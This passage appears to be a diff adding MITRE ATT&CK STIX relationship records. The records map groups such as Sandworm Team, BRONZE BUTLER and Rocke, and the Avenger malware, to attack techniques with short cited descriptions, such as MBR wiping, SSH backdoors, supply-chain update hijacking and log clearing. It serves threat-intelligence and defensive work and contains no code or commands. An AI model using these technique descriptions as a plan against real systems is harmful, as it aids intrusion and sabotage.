+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to corrupt the infected system's master boot record.(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--98b6dbac-dac9-4856-9b67-25c49e20448e",
+ "type": "relationship",
+ "modified": "2020-06-11T15:19:18.067Z",
+ "created": "2020-06-10T21:56:40.180Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) have used previously acquired legitimate credentials prior to attacks.(Citation: US-CERT Ukraine Feb 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--50156329-1c32-4044-9c6e-ee2eb079cd1c",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.191Z",
+ "created": "2020-06-10T21:56:40.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "external_references": [
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--3d450e48-e73f-417f-941d-85c8658f5d1f",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.696Z",
+ "created": "2020-06-10T21:56:40.250Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has created VBScripts to run an SSH server.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e941da7d-9d23-4ada-b4ae-36f150d70087",
+ "type": "relationship",
+ "modified": "2020-06-11T15:19:18.184Z",
+ "created": "2020-06-10T21:56:40.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used port 6789 to accept connections on the group's SSH server.(Citation: ESET BlackEnergy Jan 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--759af051-f194-4a68-98af-224f7d9916e8",
+ "type": "relationship",
+ "modified": "2020-06-11T15:05:02.087Z",
+ "created": "2020-06-10T21:56:40.267Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers.(Citation: US-CERT Ukraine Feb 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--ad949bd4-7ffd-4712-91d8-4a8523db6b50",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.261Z",
+ "created": "2020-06-10T21:56:40.261Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
+ "external_references": [
+ {
+ "source_name": "Secureworks NotPetya June 2017",
+ "url": "https://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransomware-attack",
+ "description": "Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has distributed [NotPetya](https://attack.mitre.org/software/S0368) by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.(Citation: Secureworks NotPetya June 2017)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--927434d1-b487-4e3c-909d-ac8725555080",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.559Z",
+ "created": "2020-06-11T15:05:01.794Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--688ff9e6-5482-4019-b092-9e831bbac490",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.403Z",
+ "created": "2020-06-11T16:18:16.732Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify installed anti-virus products on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--50dbe887-4d91-42d3-8e1b-34000ad5a1e7",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.411Z",
+ "created": "2020-06-11T16:18:16.769Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify the host volume ID and the OS architecture on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fc4c0c44-2e94-47c1-9174-fcf0fa1a80b4",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.406Z",
+ "created": "2020-06-11T16:18:16.773Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to decrypt files downloaded from C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--70b94aa6-7cf1-4cf5-b00b-aed156036f1e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.400Z",
+ "created": "2020-06-11T16:18:16.767Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to XOR encrypt files to be sent to C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--699171c1-0d17-48d7-a741-0e4a0ed4ef62",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.413Z",
+ "created": "2020-06-11T16:18:16.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to browse files in directories such as Program Files and the Desktop.(Citation: Trend Micro Tick November 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--73af2cc2-699d-4183-b69f-f15b3e8c0494",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.654Z",
+ "created": "2020-06-11T16:18:16.787Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to download files from C2 to a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--96c91811-fec3-43a6-890f-08921e543325",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.661Z",
+ "created": "2020-06-11T16:18:16.792Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to identify running processes.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4a5d8511-633c-4429-ac64-37a4815bf545",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.657Z",
+ "created": "2020-06-11T16:18:16.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--99365890-fc6c-46ec-bf1f-66ccbe5d52e7",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.651Z",
+ "created": "2020-06-11T16:18:16.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ff5d1433-de7a-4aba-95c4-5d92782589f9",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.664Z",
+ "created": "2020-06-11T16:19:17.925Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8e6cbb16-a5cb-4957-8654-dfde2471c3de",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.231Z",
+ "created": "2020-06-11T16:28:58.231Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor to enumerate information about the infected system's operating system.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f7f1c7c3-192b-4675-815d-0a61b3e3a206",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.249Z",
+ "created": "2020-06-11T16:28:58.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7e6e46e1-6990-4d37-87cb-9ef6a488a8a1",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.240Z",
+ "created": "2020-06-11T16:28:58.270Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used malware to enumerate proxy settings from the M.E.Doc application.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c7cf1f99-d2f8-4ce2-b32e-3cd6116d9e15",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.242Z",
+ "created": "2020-06-11T16:28:58.305Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has incorporated code into several tools that attempts to terminate anti-virus processes.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8cb3eda9-3829-4bc0-aa72-704df128d92e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.666Z",
+ "created": "2020-06-11T19:27:54.270Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used TROJ_GETVERSION to discover system services.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--069d3677-2694-4385-b5c3-ea6e231d26d9",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.640Z",
+ "created": "2020-06-11T19:27:54.275Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has cleared log files within the /var/log/ folder.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--93b62fc4-f024-4482-9ea1-041bc3d29bfd",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.230Z",
+ "created": "2020-06-11T19:52:07.230Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used uname -m to collect the name and information about the infected system's kernel.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--322876d6-1b49-43d8-9e4a-590919d1f930",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.232Z",
+ "created": "2020-06-11T19:52:07.232Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
